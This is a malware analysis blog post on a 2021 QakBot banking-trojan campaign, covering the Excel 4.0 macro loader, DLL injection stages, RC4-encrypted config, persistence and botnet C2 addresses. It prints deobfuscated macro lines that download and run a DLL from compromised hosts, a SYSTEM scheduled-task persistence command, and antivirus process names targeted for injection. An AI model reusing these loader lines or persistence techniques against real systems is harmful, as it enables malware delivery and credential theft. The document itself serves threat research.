A taste of the latest release of QakBot

Pierluigi Paganini May 06, 2021

A taste of the latest release of QakBot – one of the most popular and mediatic trojan bankers active since 2007.

The malware QakBot, also known as Qbot, Pinkslipbot, and Quakbot is a banking trojan that has been made headlines since 2007. This piece of malware is focused on stealing banking credentials and victim’s secrets using different techniques tactics and procedures (TTP) which have evolved over the years, including its delivery mechanisms, C2 techniques, and anti-analysis and reversing features.

Emotet is known as the most popular threat distributing QakBot in the wild, nonetheless, Emotet has been taken down recently, and QakBot operators are using specially target campaigns to disseminate this threat around the globe. Figure 1 shows two email templates distributing QakBot in Portugal in early May 2021.

QakBot

Figure 1: Email template of QakBot malware targeting Portuguese Internet end users – May 2021.
h/t @MiguelSantareno – malware submitted on 0xSI_f33d

Additionally, QakBot is able to move laterally on the internal environment for stealing sensitive data, making internal persistence, or even for deploying other final payloads like ransomware. In recent reports, it could be used to drop other malware such as ProLock and Egregor ransomware. At the moment, and after the Emotet takedown, QakBot becoming one the most prominent and observed threats allowing criminals to gain a foothold on internal networks. In the next workflow, we can learn how the QakBot infection chain works.

QakBot


Figure 2: 
High-level diagram of QakBot malware and its capabilities.

QakBot is disseminated these days using target phishing campaigns in several languages, including Portuguese. The infection chain starts with an URL in the email body that downloads a zip archive containing an XLM or XLSM file (Excel) that takes advantage of XLM 4.0 macros to download the 2nd stage from the compromised web servers.

The 2nd stage – in a form of a DLL with random extension – is loaded into the memory using the DLL injection technique via rundll32.exe Windows utility. After that, the final payload (QakBot itself) is loaded in memory and the malicious activity is then initiated. The malware is equipped with a list of hardcoded IP addresses from its botnet, and it receives commands and updates from the C2 server, including the deployment of additional payloads like ransomware.

Dribbling AVs with XLM macros 

The malicious Office document, when opened, it poses as a DocuSign file – a popular software for signing digital documents. The malicious documents take advantage of Excel 4.0 macros (XML macros) stored in hidden sheets that download the QakBot 2nd stage payload from the Internet – malicious servers compromised by criminals. Then, the DLL is written to disk and executed using the DLL injection technique via regsvr32 or rundll32 utilities.

QakBot

Figure 3: Excel document used to lure victims and download and execute the QakBot 2nd stage.

According to a publication by ReversingLabs, “among 160,000 Excel 4.0 documents, more than 90% were classified by TitaniumCloud as malicious or suspicious“.

(…) if you encounter a document that contains XLM macros, it is almost certain that its macro will be maliciousRL concluded.

Sample ClassificationCountPercentage
Goodware144589.1%
Suspicious7380.5%
Malicious14405290.4%
Total159248100%

Table 1: Classification and distribution of documents containing XLM macros (source).

The malware families detected in the sample set by RL show that ZLoader and Quakbot are the dominant malware families in the Excel 4.0 malware ecosystem.

QakBot

Figure 4: Malware family distribution using XLM macros in the wild (source).

XLSM file – QakBot loader


Filename: catalog-1712981442.xlsm
MD5: f86c6670822acb89df1eddb582cf0e90
Creation time: 2021-04-29 22:18:33


An XLSM file is a macro-enabled spreadsheet created by Microsoft Excel, a widely-used spreadsheet program included in the Microsoft Office suite. These kinds of files contain worksheets of cells arranged by rows and columns as well as embedded macros.

The compressed Microsoft Excel filenames appear to follow a naming convention beginning with document- or catalog-, followed by several digits and the .xlsm or .xls extension, for example, catalog-1712981442.xlsm.

Initially, the Excel document prompts the victim for enabling macros to start the infection chain. In detail, the Excel spreadsheet contains hidden spreadsheets – Excel 4.0 macros, spreadsheet formulas, and BIFF record all with the goal of passing a wrong visual inspection for the final user and malware analysts.

QakBot

Figure 5: Only the first sheet appears when the XLSM file is opened in order to obfuscate the malicious content from the eyes of the malware researchers.

Looking at the internal XML files that are part of the Excel XLSM file, we can easily identify that exist other sheets hidden inside the document, as highlighted in Figure 6.

QakBot

Figure 6: Discovering other hidden sheets inside the internal structure of the malicious XLSM doc file.

From the content highlighted above, we can see the names “Sheet1“, “Sheet2“, “Sheet3” and “Sheet4” as the total of sheets available in the document, and also that “Sheet2” will trigger something when the document is opened using the feature “xlnm.Auto_Open” call.

In short, this type of malicious documents will usually have a cell as “Auto_Open cell”, and its functionality is very similar to the “Sub AutoOpen()” function in VBA to automatically run macros when the victim press the “Enable Content” button at the start.

Just a way to confirm we are facing a malicious document, we investigated the internal file: shareString.xml – which usually contains interesting stuff such as hardcoded strings, URLs, and so on.

Bingo!

QakBot
QakBot

Figure 7: Hardcoded URLs used to download the QakBot 2nd stage via URLDownloadtoFile call and execute it using rundll32.

From this point, we know that the 2nd stage will be downloaded from the previous URLs using the URLDownloadtoFile call, but some content seems a bit obfuscated. This is the interesting part that makes XLM macros a potent initial stage to start malware infection chains.

Digging into the details, we can observe that several combinations and operations in documents cells are performed to concatenate the final string that will execute the QakBot DLL (2nd stage) into the memory.

QakBot

Figure 8: Malicious code responsible for starting the QakBot 2nd stage and available on several hidden sheets.

Part of the strings extracted from the malicious Excel file are presented below:auto_open:

auto_open: auto_open->Sheet2!$AO$115 SHEET: Sheet2, Macrosheet CELL:AO134     , =SET.VALUE(AY120,AV131&AV132&AV133&AV134&AV135&AV136&AV137&"2 "), 1 CELL:AR125     , =Sheet3!AQ22:AQ22() , 0 CELL:AO129     , =WORKBOOK.HIDE("Sheet2",1.0)=WORKBOOK.HIDE("Sheet3",1.0)=WORKBOOK.HIDE("Sheet4",1.0), 1 CELL:AO127     , =FORMULA(Sheet3!AS39:AS39&Sheet3!AS40:AS40&Sheet3!AS41:AS41&Sheet3!AS42:AS42&Sheet3!AS43:AS43&Sheet3!AS44:AS44&Sheet3!AS45:AS45&Sheet3!AS46:AS46&Sheet3!AS47:AS47&Sheet3!AS48:AS48&Sheet3!AS49:AS49&Sheet3!AS50:AS50&Sheet3!AS51:AS51&Sheet3!AS52:AS52&Sheet3!AS53:AS53&Sheet3!AS54:AS54,Sheet2!AY113:AY113), 1 CELL:AO138     , =SET.VALUE(AY115,AU123), 1 CELL:AO142     , =FORMULA(AV117&AV118&AY120&Sheet3!AT39:AT39&"1"&Sheet2!AY113:AY113&Sheet2!AV139:AV139,AW148), 1 CELL:AW148     , =EXEC("rundll32 ..\jordji.nbvt11,DllRegisterServer"), 33.0 CELL:AO136     , =SET.VALUE(AY108,Sheet3!AQ39:AQ39&Sheet3!AQ40:AQ40&Sheet3!AQ41:AQ41&Sheet3!AQ42:AQ42&Sheet3!AQ43:AQ43&Sheet3!AQ44:AQ44&Sheet3!AQ45:AQ45&Sheet3!AQ46:AQ46&Sheet3!AQ47:AQ47&Sheet3!AQ48:AQ48&Sheet3!AQ49:AQ49&Sheet3!AQ50:AQ50&Sheet3!AQ51:AQ51&Sheet3!AQ52:AQ52&Sheet3!AQ53:AQ53&Sheet3!AQ54:AQ54&Sheet3!AQ55:AQ55), 1 CELL:AO145     , =AR123()            , 0 CELL:AW147     , =EXEC("rundll32 ..\jordji.nbvt1,DllRegisterServer"), 33.0 CELL:AO135     , =SET.VALUE(AY107,AV123&Sheet2!AV124:AV124&Sheet2!AV125:AV125&Sheet2!AV126:AV126&Sheet2!AV127:AV127), 1 CELL:AO133     , =SET.VALUE(AY118,Sheet3!AR39:AR39&Sheet3!AR40:AR40&Sheet3!AR41:AR41&Sheet3!AR42:AR42&Sheet3!AR43:AR43&Sheet3!AR44:AR44), 1 CELL:AW152     , =Sheet3!AT14:AT14() , 0 CELL:AT104     , ="..\jjoputi.vvt"   , ..\jjoputi.vvt CELL:AO140     , =FORMULA(AV117&AV118&AY120&Sheet3!AT39:AT39&Sheet2!AY113:AY113&Sheet2!AV139:AV139,AW147), 1 CELL:AV123     , =CHAR(85.0)         , U (...) CELL:AT115     , None                , https://dentistelmhurstny.com/42te9VZqUDc/hadrt.html CELL:AT114     , None                , https://legalopspr.com/BnUwbRV9foc/hartd.html (...) HEET: Sheet3, Macrosheet CELL:AQ27      , =4984654.0+9846544.0+468464.0=CALL(Sheet2!AY107:AY107&"n",Sheet2!AY108:AY108&"A",Sheet2!AY118:AY118,Sheet3!AR49:AR49,Sheet2!AT114:AT114,Sheet3!AT39:AT39,0.0,0.0)=CALL(Sheet2!AY107:AY107&"n",Sheet2!AY108:AY108&"A",Sheet2!AY118:AY118,Sheet3!AR49:AR49,Sheet2!AT115:AT115,Sheet3!AT39:AT39&"1",0.0,0.0), 0 CELL:AT22      , =HALT()             , 1 CELL:AQ32      , =Sheet2!AW142:AW142(), 0

In order to understand in detail and reveal the clear source code, we need to learn about the BIFF8 formatSome details and workarounds were also shared in an old campaign involving the FlawedAmmyy malware here.

According to the XLM specification by Microsoft available here, all the information about the sheet, including its name, type, and stream position is kept within a BOUNDSHEET record (85h). Figure 9 shows how a Sheet type is defined and the Hidden status possible flags:

  • 00h:  visible 
  • 01h:  hidden 
  • 02h:  very hidden 

QakBot

Figure 9: BIFF format and BOUNDSHEET information (85h), including sheet type and its possible status.

By analyzing the XLSM document, we can see in Figure 10 that only the first BOUNDSHEET ( 0x09 0xF0 0x00 0x00 ) has the hidden status as visible – 0x00h. The other BOUNDSHEETS are defined as very hidden using the hex value 0x02h.

QakBot

Figure 10: Internal details about the malicious BOUNDSHEETS and hidden states.

Digging into the details, four BOUNDHSEET records means that the document has four sheets, but three of them are very hidden. Using a common HEX editor, we can change the values and fix the target XLSM file as depicted in Figure 11.

QakBot

Figure 11: Patching the XLSM malicious file to unhide all the sheets.

As highlighted above, the values of the last bytes 0x02h and 0x01h were changed to 0x00h and 0x00h on the BOUNDSHEET related to Sheet2. The same process was done to the other BOUNDSHEETS. By opening again the malicious file, we can see now that all the sheets are available and also navigate through the source code spread on random cells.

QakBot

Figure 12: Souce code available on the revealed Sheets.

During the code analysis, we found that criminals used another trick to make hard the analysis task. To prevent a casual visual inspection of these values, the font color was set to white. So, before analyzing the cells, we need to change the document background color or the font color.

By deobfuscation the formulas and reassembling the strings back to the original form, we can learn how the malicious chain starts:

  • The loader uses a VBA CALL statement to access the URLDownloadToFile function from URLMon.dll to download the 1st stage DLL from the hardcoded URLs to the local path (..\\) using a random name to the file: jordji.nbvt1.
  • Next, the DLL is loaded into the memory using the DLL injection technique via rundll32.exe utility from Windows, allowing code to be executed.

CALL(URLMon,URLDownloadToFileA,JJCCBB,0,hxxps://dentistelmhurstny.]com/…,..\\jordji.nbvt11,0)EXEC(“rundll32 ..\jordji.nbvt11,DllRegisterServer”)

QakBot 2nd stage – the bait loader


Filename: jordji.nbvt11
Original filename: rwenc.dll
MD5: 7d0f6c345cdaf9e290551b220d53cd14
Creation time: 2021-04-13 19:53:55


The QakBot 2nd stage is a DLL loaded in memory and its principal mission is:

  • Execute in memory the last payload (QakBot itself)
  • Make hard the malware analysis, seems a legitimate file, and adding confusion with non-used libraries, calls, and so on.

At the first glance, this DLL seems very simple, with just a few calls present on the Import Address Table (IAT). Nonetheless, something caught our eyes, the triple chain: LoadLibraryAVirtualAlloc, and VirtualProtect. No doubt, we are facing a DLL injection technique and another payload is going to be executed in memory.

QakBot

Figure 13: QakBot 2nd stage, its import table (IAT), and the well-known calls used in the DLL injection technique.

Gotcha!

QakBot

QakBot

Figure 14: QakBot final stage dumped from memory.

The art of confusion … playing with bins

In another sample we have analyzed (9b1a02189e9bdf9af2f026d8409c94f7), the process of injecting the last payload into the memory is very similar, but the loader was developed in Delphi – a clear sign that criminals are adding additional layers, resources, and features to make hard the QakBot identification and its analysis/detection.

QakBot

Figure 15: Identification of Delphi forms and unknown resources (encrypted QakBot DLL).

Criminals use multiple loaders like this built-in Delphi language with a lot of junk, GUI forms, and native functions from Delphi as a way of deceiving threat detection systems and hidden the last payload from the tentacles of the malware analysts.

QakBot

Figure 16: A lot of Delphi native functions and forms to make hard malware detection.

The art of confusion is not new, and several trojans are using this kind of approach in their operations, such as JavaliGrandoreiro, and URSA, all of them banking trojans that come from Latin American countries.

Take a look at the code, we can find that once again the LoadLibrary call is used to execute in memory the last QakBot payload. Figure 17 highlights the parts of the code responsible for loading the final payload.

QakBot

Figure 17: DLL injection technique used to load the last QakBot payload into the memory.

We got it!

QakBot

Figure 18: Dumping from the memory the last stage of QakBot malware.

There is no doubt, it is the same payload just compiled on a different date (another release).

QakBot

Figure 19: PE information about the QakBot last stage (stager_1.dll).

QakBot last stage – The beast

The last stage of this chain – QakBot itself – is also a DLL built with Microsoft Visual C++, the original name is stager_1.dll, and it exports only the function: DllRegisterServer. The easy way to identify the last release of the QakBot DLL, it’s looking at the two resources named “118” (C2 list) and “524” (bot config) encrypted using the RC4 algorithm.

QakBot

Figure 20: Resources name found in the last release of the QakBot DLL.

An interesting detail regarding this new release is that QakBot tries to decrypt the configuration as usual. Initially, it takes the first 20 bytes of the resource and uses it as the RC4 key. After that, it takes 20 bytes from the decrypted blob and uses the bytes as a SHA1 verification for the rest of the decrypted data.

The fresh method starts here. Every time the SHA1 validations fail, QakBot tries the new decryption method. In sum, it uses the SHA1 PowerShell path hardcoded inside the binary as an RC4 key. This new approach involves the new campaigns: bidenclinton, and tr and was introduced in the 401 major

version.\System32\WindowsPowerShell\v1.0\powershell.exe

Some samples of QakBot trojan are signed PE files with a valid signature issued by several CAs. For example, we can see this sample (cd1ab264088207f759e97305d8bf847d) is signed by Sectigo – a well-known CA also abused by developers of other kinds of threats in the past.

A popular technique used by criminals to make complicated and to waste the reverse engineer’s time analyzing is the junk code insertion. In this sense, QakBot is not an exception. The malware author added a lot of API calls that alternates between the real instructions – to enlarge the analysis time-consuming and cause disturbing when the malware executes in a sandbox environment.

Another interesting detail is that the developers of QakBot added a non-standard calling convention that makes it difficult to understand and recognize the real parameters passed to the functions. The common standard calling conventions are cdeclstdcallthiscall or fastcall.

The strings inside the QakBot are encrypted, decrypted in run-time, and destroyed after use (like the mediatic Emotet). Some of the strings hardcoded inside the DLL are presented below.

As observed below, the strings are encrypted and stored in a continuous blob. The decryption function accepts an argument: index to the string; and then XORed it with a hardcoded byte array.

After this point, some strings will be decrypted in run-time and also the API functions via a pre-computed hash based on the API functions that will resolve calls dynamically. More details about this can be found in this great article by the VinCSS blog.

Also important to highlight some anti-debugging and protection mechanisms used by this piece of malware. Also stated by VinCSS analysis, “if the victim machine uses Kaspersky protection (avp.exe process), QakBot will inject code into mobsync.exe instead of explorer.exe.“. We can find more details and target processes in Figure 27 below.

The full list of target processes can be found below:

ccSvcHst.exeavgcsrvx.exeavgsvcx.exeavgcsrva.exeMsMpEng.exemcshield.exeavp.exekavtray.exeegui.exeekrn.exebdagent.exevsserv.exevsservppl.exeAvastSvc.execoreServiceShell.exePccNTMon.exeNTRTScan.exeSAVAdminService.exeSavService.exefshoster32.exeWRSA.exevkise.exeisesrv.execmdagent.exeMBAMService.exeByteFence.exembamgui.exefmon.exewinmail.exewmplayer.exeoutlook.exeexplorer.exeiexplore.exeWerFault.exeWerFaultSecure.exetaskhost.exewmiprvse.exesvchost.exe

During this analysis, QakBot injected a new payload in the target process “explorer.exe” and then a scheduled task was created as a persistence mechanism using schtasks.exe Windows utility.”C:\Windows\system32\schtasks.exe” /Create /RU “NT AUTHORITY\SYSTEM” /tn vcjscfpqk /tr “regsvr32.exe -s \”C:\Users\Admin\AppData\Local\Temp\k.exe.dll\”” /SC ONCE /Z /ST 01:34 /ET 01:46

QakBot

Figure 28:  Process flow of the QakBot execution.

In addition, the QakBot DLL will be loaded every time using the Register Server utility, regsvr32.exe, with the following parameters:

  • /Create: schedules a new task
  • /RU “NT AUTHORITY\\SYSTEM”: executes the task with elevated system privileges
  • /tn <RANDOM_STRING>: specifies the task name, seemingly using a random string
  • /tr “regsvr32.exe -s \\”<PAYLOAD>”: the process to be executed, in this case, regsvr32 is passed a malicious dynamic link library (DLL)
  • /SC ONCE: task scheduled to execute once at the specified time
  • /Z: delete the task upon completion of the schedule
  • /ST <Now + 3 minutes as hh:mm>: start time, used by the ONCE schedule; and
  • /ET <Now + 15 minutes as hh:mm>: end time, used by the ONCE schedule.

Botnet hardcoded IP Addresses

Campaign: 1618935072
Botnet: tr
Version: 402.12
URL tria.ge: https://tria.ge/210502-aek3yedsfj

Botnet full list:140.82.49.12:443190.85.91.154:44396.37.113.36:99371.41.184.10:3389186.31.46.121:44373.25.124.140:2222109.12.111.14:44324.229.150.54:99545.32.211.207:44345.77.117.108:44345.77.117.108:8443149.28.98.196:443149.28.98.196:2222144.202.38.185:443144.202.38.185:99545.32.211.207:995207.246.116.237:995149.28.99.97:99545.63.107.192:2222149.28.101.90:99545.77.115.208:222245.32.211.207:844345.32.211.207:222245.77.115.208:443207.246.116.237:44345.77.117.108:2222149.28.98.196:99545.63.107.192:443149.28.101.90:844324.152.219.253:995149.28.101.90:443149.28.101.90:222245.77.115.208:99545.77.115.208:8443207.246.77.75:8443207.246.77.75:2222207.246.116.237:222245.77.117.108:995149.28.99.97:443144.202.38.185:2222207.246.77.75:995207.246.77.75:443207.246.116.237:844324.55.112.61:44347.22.148.6:443216.201.162.158:443197.45.110.165:99524.117.107.120:44371.163.222.243:443189.210.115.207:443149.28.99.97:222245.63.107.192:995151.205.102.42:44375.118.1.141:443105.198.236.101:44372.252.201.69:44367.8.103.21:443136.232.34.70:44375.67.192.125:44372.240.200.181:222275.137.47.174:44378.63.226.32:44395.77.223.148:44381.97.154.100:443105.198.236.99:44383.110.109.164:222250.29.166.232:995115.133.243.6:44327.223.92.142:99545.46.53.140:2222173.21.10.71:222271.74.12.34:44398.252.118.134:44376.25.142.196:44324.226.156.153:44347.196.192.184:44367.165.206.193:99373.151.236.31:44398.192.185.86:44324.139.72.117:44394.59.106.186:2078188.26.91.212:443184.185.103.157:443172.78.47.100:443195.6.1.154:222286.190.41.156:443108.14.4.202:44324.43.22.219:99386.220.62.251:222297.69.160.4:222290.65.236.181:222271.187.170.235:44350.244.112.106:44396.61.23.88:99564.121.114.87:443144.139.47.206:443222.153.174.162:99577.27.207.217:99524.95.61.62:44377.211.30.202:99592.59.35.196:2222125.62.192.220:443195.12.154.8:44368.186.192.69:44375.136.40.155:44371.117.132.169:44396.21.251.127:222271.199.192.62:44370.168.130.172:99583.196.56.65:222281.214.126.173:222282.12.157.95:995209.210.187.52:995209.210.187.52:44367.6.12.4:443189.222.59.177:443174.104.22.30:443142.117.191.18:2222189.146.183.105:443213.60.147.140:443196.221.207.137:995108.46.145.30:443187.250.238.164:9952.7.116.188:2222195.43.173.70:443106.250.150.98:44345.67.231.247:44383.110.103.152:44383.110.9.71:222278.97.207.104:44359.90.246.200:44380.227.5.69:443125.63.101.62:44386.236.77.68:2222109.106.69.138:222284.72.35.226:443217.133.54.140:32100197.161.154.132:44389.137.211.239:99574.222.204.82:995122.148.156.131:995156.223.110.23:443144.139.166.18:443202.185.166.181:44376.94.200.148:99571.63.120.101:443196.151.252.84:443202.188.138.162:44374.68.144.202:44369.58.147.82:2078

Botnet and campaign identifiers

The following botnet and campaign identifiers have been observed last weeks (since March 2021) with those behind Qakbot recently using US President names:abc025 – 1603896786biden01 – 1613753447biden02 – 1614254614biden03 – 1614851222biden09 – 1614939927obama07 – 1614243368obama08 – 1614855149obama09 – 1614939797tr – 1614598087tr – 1618935072

Mitre Att&ck Matrix

TacticIDNameDescription
Defense EvasionT1027Obfuscated Files or InformationQakBot XLM files are obfuscated and sheets are hidden.
Defense EvasionT1027.002Obfuscated Files or Information: Software PackingEvery binary and config is obfuscated and encrypted using RC4 cipher.
Execution, Persistence, Privilege EscalationT1053Scheduled Task/JobQakBot creates tasks to maintain persistence.
Execution, Persistence, Privilege EscalationT1053.005Scheduled Task/Job: Scheduled TaskQakBot uses this TTP as a way of executing every time the malicious DLL.
Defense Evasion, Privilege EscalationT1055Process InjectionQakBot uses Process Injection to load into the memory some payloads.
Defense Evasion, Privilege EscalationT1055.001Process Injection: Dynamic-link Library InjectionDLL injection is used to load QakBot via rundll32 Windows utility.
Collection, Credential AccessT1056Input CaptureQakBot collects credentials and sensitive data from the victim’s devices.
 DiscoveryT1057Process DiscoveryQakBot performs process discovery.
DiscoveryT1082System Information DiscoveryQakBot obtains the list of processes and other details.
Discovery,  Defense EvasionT1497Virtualization/Sandbox EvasionAnti-VM and sandbox techniques are used to evade detection.
Discovery,  Defense EvasionT1497.003Virtualization/Sandbox Evasion: Time Based EvasionTime-based evasion is checked during the malware run time.
DiscoveryT1518Software DiscoveryA list of the installed software is obtained.
DiscoveryT1518.001Software Discovery: Security Software DiscoveryInstalled AVs and other security software are obtained.

Final Thoughts

QakBot is a sophisticated trojan designed to collect banking information from victims’ devices. This piece of malware is targeting mostly US organizations and it is equipped with a variety of evasion and info-stealing routines as well as worm-like functions to make it persistent. In recent reports, it could be used to drop other malware such as ProLock, Egregor ransomware.

QakBot is a challenging threat with capabilities to avoid dynamic analysis in automatic sandboxes with the delayed executions present in its dropper as well as other tricks. With this capability in place, interactive sandboxes, for instance, won’t extract IoCs and artifacts from the malware easily.

Last but not least, thanks to all the guys who contributed to this analysis and mentioned in the reference section below.

Additional details are available in the original analysis published by Pedro Tavares on his blog:

About the author: Pedro Tavares

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware Researcher and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, QakBot)

[adrotate banner=”5″]

[adrotate banner=”13″]



you might also like

leave a comment